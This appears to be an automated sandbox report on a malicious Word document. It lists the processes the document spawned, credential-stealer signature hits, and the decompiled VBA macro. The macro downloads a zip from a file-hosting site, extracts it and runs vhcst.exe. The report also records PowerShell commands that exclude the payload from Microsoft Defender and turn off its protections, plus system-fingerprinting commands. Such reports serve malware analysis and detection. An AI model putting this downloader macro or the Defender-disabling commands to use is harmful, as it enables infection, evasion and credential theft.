                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1732591219
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RpPm6xQP0yehcf7yKFdrtIQx1Sfj9YmB9lhUA%2Fp2uiBBALVYNR9qEJF2xCbVe5TuKR7OdPlP%2Fw3jNGkIqHKo0qzQjiRVfjNSkYU1prRuMsl4HdqLDus%2FgkhFe%2FiY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e86bde869a4427f-EWR
                                                                                    {"message": "Unknown Webhook", "code": 10015}


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:22:19:22
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                    Imagebase:0x490000
                                                                                    File size:1'620'872 bytes
                                                                                    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:22:19:33
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\2716439\vhcst.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\2716439\vhcst.exe"
                                                                                    Imagebase:0x23fba420000
                                                                                    File size:227'328 bytes
                                                                                    MD5 hash:6D8282E9F5AA75B07B018DC5CC2F6BC7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\2716439\vhcst.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\2716439\vhcst.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 50%, ReversingLabs
                                                                                    • Detection: 54%, Virustotal, Browse
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:22:19:33
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\7037005\vhcst.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\7037005\vhcst.exe"
                                                                                    Imagebase:0x21f818a0000
                                                                                    File size:227'328 bytes
                                                                                    MD5 hash:6D8282E9F5AA75B07B018DC5CC2F6BC7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2223963813.0000021F8382B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 50%, ReversingLabs
                                                                                    • Detection: 54%, Virustotal, Browse
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:22:19:37
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:22:19:37
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x140000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:22:19:40
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:22:19:43
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:22:19:43
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:22:19:50
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"wmic.exe" os get Caption
                                                                                    Imagebase:0x7ff637cd0000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:22:19:50
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:22:19:50
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                    Imagebase:0x7ff637cd0000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:22:19:50
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:22:19:51
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"wmic.exe" csproduct get uuid
                                                                                    Imagebase:0x7ff637cd0000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:22:19:51
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:21
                                                                                    Start time:22:19:51
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:22:19:51
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:22:19:59
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"wmic" path win32_VideoController get name
                                                                                    Imagebase:0x7ff637cd0000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:24
                                                                                    Start time:22:19:59
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:22:20:00
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:22:20:00
                                                                                    Start date:25/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Call Graph

                                                                                    Module: ThisDocument

                                                                                    Declaration
                                                                                    LineContent
                                                                                    1

                                                                                    Attribute VB_Name = "ThisDocument"

                                                                                    2

                                                                                    Attribute VB_Base = "1Normal.ThisDocument"

                                                                                    3

                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                    4

                                                                                    Attribute VB_Creatable = False

                                                                                    5

                                                                                    Attribute VB_PredeclaredId = True

                                                                                    6

                                                                                    Attribute VB_Exposed = True

                                                                                    7

                                                                                    Attribute VB_TemplateDerived = True

                                                                                    8

                                                                                    Attribute VB_Customizable = True

                                                                                    Executed Functions

                                                                                    Subroutine

                                                                                    DownloadUnzipAndRunAPIs: 24, Strings: 3, Number of lines: 21, Relevance: 62.021

                                                                                    APIsMeta Information

                                                                                    Part of subcall function GenerateRandomValue@ThisDocument: Randomize

                                                                                    Part of subcall function GenerateRandomValue@ThisDocument: Trim

                                                                                    Part of subcall function GenerateRandomValue@ThisDocument: Str

                                                                                    Part of subcall function GenerateRandomValue@ThisDocument: Int

                                                                                    Part of subcall function GenerateRandomValue@ThisDocument: Rnd

                                                                                    Part of subcall function GenerateRandomValue@ThisDocument: lowerbound

                                                                                    MkDir

                                                                                    Part of subcall function downloadFile@ThisDocument: CreateObject

                                                                                    Part of subcall function downloadFile@ThisDocument: Open

                                                                                    Part of subcall function downloadFile@ThisDocument: Send

                                                                                    Part of subcall function downloadFile@ThisDocument: Status

                                                                                    Part of subcall function downloadFile@ThisDocument: CreateObject

                                                                                    Part of subcall function downloadFile@ThisDocument: Open

                                                                                    Part of subcall function downloadFile@ThisDocument: Type

                                                                                    Part of subcall function downloadFile@ThisDocument: Write

                                                                                    Part of subcall function downloadFile@ThisDocument: ResponseBody

                                                                                    Part of subcall function downloadFile@ThisDocument: SaveToFile

                                                                                    Part of subcall function downloadFile@ThisDocument: Close

                                                                                    Part of subcall function Unzip@ThisDocument: NameSpace

                                                                                    Part of subcall function Unzip@ThisDocument: NameSpace

                                                                                    Part of subcall function Unzip@ThisDocument: CopyHere

                                                                                    Part of subcall function Unzip@ThisDocument: Items

                                                                                    CreateObject

                                                                                    		CreateObject("WScript.Shell")

                                                                                    Run

                                                                                    		IWshShell3.Run("C:\7037005\\vhcst.exe") -> 0 IWshShell3.Run("C:\2716439\\vhcst.exe") -> 0
                                                                                    StringsDecrypted Strings
                                                                                    "https://files.catbox.moe/b5uubc.zip"
                                                                                    "C:\"
                                                                                    "WScript.Shell"
                                                                                    LineInstructionMeta Information
                                                                                    39

                                                                                    Sub DownloadUnzipAndRun()

                                                                                    40

                                                                                    Dim url as String

                                                                                    executed
                                                                                    41

                                                                                    Dim savePath as String

                                                                                    42

                                                                                    Dim ShellApp as Object

                                                                                    43

                                                                                    Dim rundomnum as String

                                                                                    44

                                                                                    Dim dirr as String

                                                                                    47

                                                                                    url = "https://files.catbox.moe/b5uubc.zip"

                                                                                    48

                                                                                    rundomnum = GenerateRandomValue

                                                                                    49

                                                                                    dirr = "C:\" & rundomnum & "\"

                                                                                    50

                                                                                    MkDir dirr

                                                                                    MkDir

                                                                                    52

                                                                                    savePath = dirr & "b5uubc.zip"

                                                                                    53

                                                                                    downloadFile url, savePath

                                                                                    54

                                                                                    Unzip dirr

                                                                                    55

                                                                                    Dim objShell as Object

                                                                                    56

                                                                                    Set objShell = CreateObject("WScript.Shell")

                                                                                    CreateObject("WScript.Shell")

                                                                                    executed
                                                                                    58

                                                                                    objShell.Run dirr & "\vhcst.exe"

                                                                                    IWshShell3.Run("C:\7037005\\vhcst.exe") -> 0

                                                                                    executed
                                                                                    59

                                                                                    Set WinHttpReq = Nothing

                                                                                    60

                                                                                    Set oStream = Nothing

                                                                                    61

                                                                                    Set ShellApp = Nothing

                                                                                    62

                                                                                    Set objShell = Nothing

                                                                                    63

                                                                                    End Sub

                                                                                    Subroutine

                                                                                    downloadFileAPIs: 11, Strings: 4, Number of lines: 14, Relevance: 54.014

                                                                                    APIsMeta Information

                                                                                    CreateObject

                                                                                    		CreateObject("Microsoft.XMLHTTP")

                                                                                    Open

                                                                                    		IServerXMLHTTPRequest2.Open("GET","https://files.catbox.moe/b5uubc.zip",False)

                                                                                    Send

                                                                                    Status

                                                                                    		IServerXMLHTTPRequest2.Status() -> 200

                                                                                    CreateObject

                                                                                    		CreateObject("ADODB.Stream")

                                                                                    Open

                                                                                    		Stream.Open()

                                                                                    Type

                                                                                    Write

                                                                                    		Stream.Write(??\x14\x00\x08?????\x01?\x03 \x00??????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????+????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????T??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????3??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O?????????????????????????\x7f????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????i????????????????????????????????????????????????????????????X????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????f???????????????????????????\???????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????+????????????????????????????????????????????????????????????\xfffd??????????t?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????{???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E????????????L??????????????????????????????????????\xfffd?????????????????????????????????????E?????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????????????????????????\x04???????V?????????????\x0e????o????????=???\x07?????????????\x1e??????W??*????? ??*????????\x15?\xfffd????????????\xfffd??????????=??????\xfffd????\xfffd??????U??????U??????z???\x0e????????????????????\xfffd??R?????T??????????x???\xfffd?????????\x0e????\xfffd???\xfffd??????r?????W??????????\????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????r??????????????????????????????????????????????????????????????????????????????????????????<????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????????????????????+?????????:?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????)

                                                                                    ResponseBody

                                                                                    		IServerXMLHTTPRequest2.ResponseBody() -> ??\x14\x00\x08?????\x01?\x03 \x00??????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????+????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????T??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????3??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O?????????????????????????\x7f????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????i????????????????????????????????????????????????????????????X????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????f???????????????????????????\???????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????+????????????????????????????????????????????????????????????\xfffd??????????t?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????{???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E????????????L??????????????????????????????????????\xfffd?????????????????????????????????????E?????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????????????????????????\x04???????V?????????????\x0e????o????????=???\x07?????????????\x1e??????W??*????? ??*????????\x15?\xfffd????????????\xfffd??????????=??????\xfffd????\xfffd??????U??????U??????z???\x0e????????????????????\xfffd??R?????T??????????x???\xfffd?????????\x0e????\xfffd???\xfffd??????r?????W??????????\????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????r??????????????????????????????????????????????????????????????????????????????????????????<????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????????????????????+?????????:?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

                                                                                    SaveToFile

                                                                                    Close

                                                                                    StringsDecrypted Strings
                                                                                    "Microsoft.XMLHTTP"
                                                                                    "GET"
                                                                                    "ADODB.Stream"
                                                                                    "ADODB.Stream"
                                                                                    LineInstructionMeta Information
                                                                                    9

                                                                                    Sub downloadFile(url as String, fileOutPath as String)

                                                                                    10

                                                                                    Dim WinHttpReq as Object, oStream as Object

                                                                                    executed
                                                                                    11

                                                                                    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

                                                                                    CreateObject("Microsoft.XMLHTTP")

                                                                                    executed
                                                                                    12

                                                                                    WinHttpReq.Open "GET", url, False

                                                                                    IServerXMLHTTPRequest2.Open("GET","https://files.catbox.moe/b5uubc.zip",False)

                                                                                    executed
                                                                                    13

                                                                                    WinHttpReq.Send

                                                                                    Send

                                                                                    14

                                                                                    If WinHttpReq.Status = 200 Then

                                                                                    IServerXMLHTTPRequest2.Status() -> 200

                                                                                    executed
                                                                                    15

                                                                                    Set oStream = CreateObject("ADODB.Stream")

                                                                                    CreateObject("ADODB.Stream")

                                                                                    executed
                                                                                    16

                                                                                    oStream.Open

                                                                                    Stream.Open()

                                                                                    executed
                                                                                    17

                                                                                    oStream.Type = 1

                                                                                    Type

                                                                                    18

                                                                                    oStream.Write WinHttpReq.ResponseBody

                                                                                    Stream.Write(??\x14\x00\x08?????\x01?\x03 \x00??????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????+????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????T??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????3??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O?????????????????????????\x7f????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????i????????????????????????????????????????????????????????????X????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????f???????????????????????????\???????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????+????????????????????????????????????????????????????????????\xfffd??????????t?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????{???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E????????????L??????????????????????????????????????\xfffd?????????????????????????????????????E?????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????????????????????????\x04???????V?????????????\x0e????o????????=???\x07?????????????\x1e??????W??*????? ??*????????\x15?\xfffd????????????\xfffd??????????=??????\xfffd????\xfffd??????U??????U??????z???\x0e????????????????????\xfffd??R?????T??????????x???\xfffd?????????\x0e????\xfffd???\xfffd??????r?????W??????????\????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????r??????????????????????????????????????????????????????????????????????????????????????????<????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????????????????????+?????????:?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????)

                                                                                    IServerXMLHTTPRequest2.ResponseBody() -> ??\x14\x00\x08?????\x01?\x03 \x00??????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????+????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????T??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????3??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O?????????????????????????\x7f????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????i????????????????????????????????????????????????????????????X????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????f???????????????????????????\???????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????+????????????????????????????????????????????????????????????\xfffd??????????t?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????{???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E????????????L??????????????????????????????????????\xfffd?????????????????????????????????????E?????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????????????????????????\x04???????V?????????????\x0e????o????????=???\x07?????????????\x1e??????W??*????? 